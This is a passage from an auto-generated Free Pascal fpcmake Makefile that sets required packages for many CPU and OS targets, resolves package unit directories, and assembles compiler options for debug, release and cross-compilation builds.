REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-palmos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-wince) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-gba) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-nds) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-symbian) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-aros) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-freertos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-ios) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-aix) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),avr-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),armeb-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),armeb-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mips-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mipsel-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mipsel-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mipsel-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mips64el-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),jvm-java) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),jvm-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i8086-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i8086-msdos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i8086-win16) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-win64) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-ios) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),wasm-wasm) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv32-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv32-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv64-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),xtensa-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),xtensa-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),xtensa-freertos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),z80-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),z80-zxspectrum) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),z80-msxdos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifdef REQUIRE_PACKAGES_RTL PACKAGEDIR_RTL:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /rtl/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_RTL),) ifneq ($(wildcard $(PACKAGEDIR_RTL)/units/$(TARGETSUFFIX)),) UNITDIR_RTL=$(PACKAGEDIR_RTL)/units/$(TARGETSUFFIX) else UNITDIR_RTL=$(PACKAGEDIR_RTL) endif ifneq ($(wildcard $(PACKAGEDIR_RTL)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_RTL=$(PACKAGEDIR_RTL)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_RTL)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_RTL=$(PACKAGEDIR_RTL)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_RTL=$(PACKAGEDIR_RTL) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_RTL)/$(OS_TARGET)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_RTL)/$(OS_TARGET) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_RTL)/$(OS_TARGET)/$(FPCMADE) endif else PACKAGEDIR_RTL= UNITDIR_RTL:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /rtl/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_RTL),) UNITDIR_RTL:=$(firstword $(UNITDIR_RTL)) else UNITDIR_RTL= endif endif ifdef UNITDIR_RTL override COMPILER_UNITDIR+=$(UNITDIR_RTL) endif ifdef UNITDIR_FPMAKE_RTL override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_RTL) endif endif ifdef REQUIRE_PACKAGES_PASZLIB PACKAGEDIR_PASZLIB:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /paszlib/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_PASZLIB),) ifneq ($(wildcard $(PACKAGEDIR_PASZLIB)/units/$(TARGETSUFFIX)),) UNITDIR_PASZLIB=$(PACKAGEDIR_PASZLIB)/units/$(TARGETSUFFIX) else UNITDIR_PASZLIB=$(PACKAGEDIR_PASZLIB) endif ifneq ($(wildcard $(PACKAGEDIR_PASZLIB)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_PASZLIB=$(PACKAGEDIR_PASZLIB)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_PASZLIB)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_PASZLIB=$(PACKAGEDIR_PASZLIB)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_PASZLIB=$(PACKAGEDIR_PASZLIB) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_PASZLIB)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_PASZLIB) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_PASZLIB)/$(FPCMADE) endif else PACKAGEDIR_PASZLIB= UNITDIR_PASZLIB:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /paszlib/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_PASZLIB),) UNITDIR_PASZLIB:=$(firstword $(UNITDIR_PASZLIB)) else UNITDIR_PASZLIB= endif endif ifdef UNITDIR_PASZLIB override COMPILER_UNITDIR+=$(UNITDIR_PASZLIB) endif ifdef UNITDIR_FPMAKE_PASZLIB override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_PASZLIB) endif endif ifdef REQUIRE_PACKAGES_FCL-PROCESS PACKAGEDIR_FCL-PROCESS:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /fcl-process/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_FCL-PROCESS),) ifneq ($(wildcard $(PACKAGEDIR_FCL-PROCESS)/units/$(TARGETSUFFIX)),) UNITDIR_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS)/units/$(TARGETSUFFIX) else UNITDIR_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS) endif ifneq ($(wildcard $(PACKAGEDIR_FCL-PROCESS)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_FCL-PROCESS)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_FCL-PROCESS)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_FCL-PROCESS) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_FCL-PROCESS)/$(FPCMADE) endif else PACKAGEDIR_FCL-PROCESS= UNITDIR_FCL-PROCESS:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /fcl-process/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_FCL-PROCESS),) UNITDIR_FCL-PROCESS:=$(firstword $(UNITDIR_FCL-PROCESS)) else UNITDIR_FCL-PROCESS= endif endif ifdef UNITDIR_FCL-PROCESS override COMPILER_UNITDIR+=$(UNITDIR_FCL-PROCESS) endif ifdef UNITDIR_FPMAKE_FCL-PROCESS override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_FCL-PROCESS) endif endif ifdef REQUIRE_PACKAGES_HASH PACKAGEDIR_HASH:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /hash/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_HASH),) ifneq ($(wildcard $(PACKAGEDIR_HASH)/units/$(TARGETSUFFIX)),) UNITDIR_HASH=$(PACKAGEDIR_HASH)/units/$(TARGETSUFFIX) else UNITDIR_HASH=$(PACKAGEDIR_HASH) endif ifneq ($(wildcard $(PACKAGEDIR_HASH)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_HASH=$(PACKAGEDIR_HASH)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_HASH)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_HASH=$(PACKAGEDIR_HASH)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_HASH=$(PACKAGEDIR_HASH) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_HASH)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_HASH) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_HASH)/$(FPCMADE) endif else PACKAGEDIR_HASH= UNITDIR_HASH:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /hash/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_HASH),) UNITDIR_HASH:=$(firstword $(UNITDIR_HASH)) else UNITDIR_HASH= endif endif ifdef UNITDIR_HASH override COMPILER_UNITDIR+=$(UNITDIR_HASH) endif ifdef UNITDIR_FPMAKE_HASH override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_HASH) endif endif ifdef REQUIRE_PACKAGES_LIBTAR PACKAGEDIR_LIBTAR:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /libtar/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_LIBTAR),) ifneq ($(wildcard $(PACKAGEDIR_LIBTAR)/units/$(TARGETSUFFIX)),) UNITDIR_LIBTAR=$(PACKAGEDIR_LIBTAR)/units/$(TARGETSUFFIX) else UNITDIR_LIBTAR=$(PACKAGEDIR_LIBTAR) endif ifneq ($(wildcard $(PACKAGEDIR_LIBTAR)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_LIBTAR=$(PACKAGEDIR_LIBTAR)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_LIBTAR)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_LIBTAR=$(PACKAGEDIR_LIBTAR)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_LIBTAR=$(PACKAGEDIR_LIBTAR) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_LIBTAR)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_LIBTAR) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_LIBTAR)/$(FPCMADE) endif else PACKAGEDIR_LIBTAR= UNITDIR_LIBTAR:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /libtar/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_LIBTAR),) UNITDIR_LIBTAR:=$(firstword $(UNITDIR_LIBTAR)) else UNITDIR_LIBTAR= endif endif ifdef UNITDIR_LIBTAR override COMPILER_UNITDIR+=$(UNITDIR_LIBTAR) endif ifdef UNITDIR_FPMAKE_LIBTAR override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_LIBTAR) endif endif ifdef REQUIRE_PACKAGES_FPMKUNIT PACKAGEDIR_FPMKUNIT:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /fpmkunit/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_FPMKUNIT),) ifneq ($(wildcard $(PACKAGEDIR_FPMKUNIT)/units/$(TARGETSUFFIX)),) UNITDIR_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT)/units/$(TARGETSUFFIX) else UNITDIR_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT) endif ifneq ($(wildcard $(PACKAGEDIR_FPMKUNIT)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_FPMKUNIT)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_FPMKUNIT=$(PACKAGEDIR_FPMKUNIT) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_FPMKUNIT)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_FPMKUNIT) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_FPMKUNIT)/$(FPCMADE) endif else PACKAGEDIR_FPMKUNIT= UNITDIR_FPMKUNIT:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /fpmkunit/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_FPMKUNIT),) UNITDIR_FPMKUNIT:=$(firstword $(UNITDIR_FPMKUNIT)) else UNITDIR_FPMKUNIT= endif endif ifdef UNITDIR_FPMKUNIT override COMPILER_UNITDIR+=$(UNITDIR_FPMKUNIT) endif ifdef UNITDIR_FPMAKE_FPMKUNIT override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_FPMKUNIT) endif endif ifndef NOCPUDEF override FPCOPTDEF=$(ARCH) endif ifneq ($(OS_TARGET),$(OS_SOURCE)) override FPCOPT+=-T$(OS_TARGET) endif ifneq ($(CPU_TARGET),$(CPU_SOURCE)) override FPCOPT+=-P$(ARCH) endif ifeq ($(OS_SOURCE),openbsd) override FPCOPT+=-FD$(NEW_BINUTILS_PATH) override FPCMAKEOPT+=-FD$(NEW_BINUTILS_PATH) override FPMAKE_BUILD_OPT+=-FD$(NEW_BINUTILS_PATH) endif ifndef CROSSBOOTSTRAP ifneq ($(BINUTILSPREFIX),) override FPCOPT+=-XP$(BINUTILSPREFIX) endif ifneq ($(BINUTILSPREFIX),) override FPCOPT+=-Xr$(RLINKPATH) endif endif ifndef CROSSCOMPILE ifneq ($(BINUTILSPREFIX),) override FPCMAKEOPT+=-XP$(BINUTILSPREFIX) override FPMAKE_BUILD_OPT+=-XP$(BINUTILSPREFIX) endif endif ifdef UNITDIR override FPCOPT+=$(addprefix -Fu,$(UNITDIR)) endif ifdef LIBDIR override FPCOPT+=$(addprefix -Fl,$(LIBDIR)) endif ifdef OBJDIR override FPCOPT+=$(addprefix -Fo,$(OBJDIR)) endif ifdef INCDIR override FPCOPT+=$(addprefix -Fi,$(INCDIR)) endif ifdef LINKSMART override FPCOPT+=-XX endif ifdef CREATESMART override FPCOPT+=-CX endif ifdef DEBUG override FPCOPT+=-gl override FPCOPTDEF+=DEBUG endif ifdef RELEASE FPCCPUOPT:=-O2 override FPCOPT+=-Ur -Xs $(FPCCPUOPT) -n override FPCOPTDEF+=RELEASE endif ifdef STRIP override FPCOPT+=-Xs endif ifdef OPTIMIZE override FPCOPT+=-O2 endif ifdef VERBOSE override FPCOPT+=-vwni endif ifdef COMPILER_OPTIONS override FPCOPT+=$(COMPILER_OPTIONS) endif ifdef COMPILER_UNITDIR override FPCOPT+=$(addprefix -Fu,$(COMPILER_UNITDIR)) endif ifdef COMPILER_LIBRARYDIR override FPCOPT+=$(addprefix -Fl,$(COMPILER_LIBRARYDIR)) endif ifdef COMPILER_OBJECTDIR override FPCOPT+=$(addprefix -Fo,$(COMPILER_OBJECTDIR)) endif ifdef COMPILER_INCLUDEDIR override FPCOPT+=$(addprefix -Fi,$(COMPILER_INCLUDEDIR)) endif ifdef CROSSBINDIR override FPCOPT+=-FD$(CROSSBINDIR) endif ifdef COMPILER_TARGETDIR override FPCOPT+=-FE$(COMPILER_TARGETDIR) ifeq ($(COMPILER_TARGETDIR),.) override TARGETDIRPREFIX= else override TARGETDIRPREFIX=$(COMPILER_TARGETDIR)/ endif endif ifdef COMPILER_UNITTARGETDIR override FPCOPT+=-FU$(COMPILER_UNITTARGETDIR) ifeq ($(COMPILER_UNITTARGETDIR),.) override UNITTARGETDIRPREFIX= else override UNITTARGETDIRPREFIX=$(COMPILER_UNITTARGETDIR)/ endif else ifdef COMPILER_TARGETDIR override COMPILER_UNITTARGETDIR=$(COMPILER_TARGETDIR) override UNITTARGETDIRPREFIX=$(TARGETDIRPREFIX) endif endif ifdef CREATESHARED override FPCOPT+=-Cg endif ifneq ($(findstring $(OS_TARGET),dragonfly freebsd openbsd netbsd linux solaris),) ifneq ($(findstring $(CPU_TARGET),x86_64 mips mipsel),) override FPCOPT+=-Cg endif endif ifdef LINKSHARED endif ifdef GCCLIBDIR override FPCOPT+=-Fl$(GCCLIBDIR) ifdef FPCMAKEGCCLIBDIR override FPCMAKEOPT+=-Fl$(FPCMAKEGCCLIBDIR) else override FPCMAKEOPT+=-Fl$(GCCLIBDIR) endif endif ifdef OTHERLIBDIR override FPCOPT+=$(addprefix -Fl,$(OTHERLIBDIR)) endif ifdef OPT override FPCOPT+=$(OPT) endif ifdef FPMAKEBUILDOPT override FPMAKE_BUILD_OPT+=$(FPMAKEBUILDOPT) endif ifdef FPCOPTDEF override FPCOPT+=$(addprefix -d,$(FPCOPTDEF)) endif ifdef CFGFILE override FPCOPT+=@$(CFGFILE) endif ifdef USEENV override FPCEXTCMD:=$(FPCOPT) override FPCOPT:=!FPCEXTCMD export FPCEXTCMD endif override AFULL_TARGET=$(CPU_TARGET)-$(OS_TARGET) override AFULL_SOURCE=$(CPU_SOURCE)-$(OS_SOURCE) ifneq 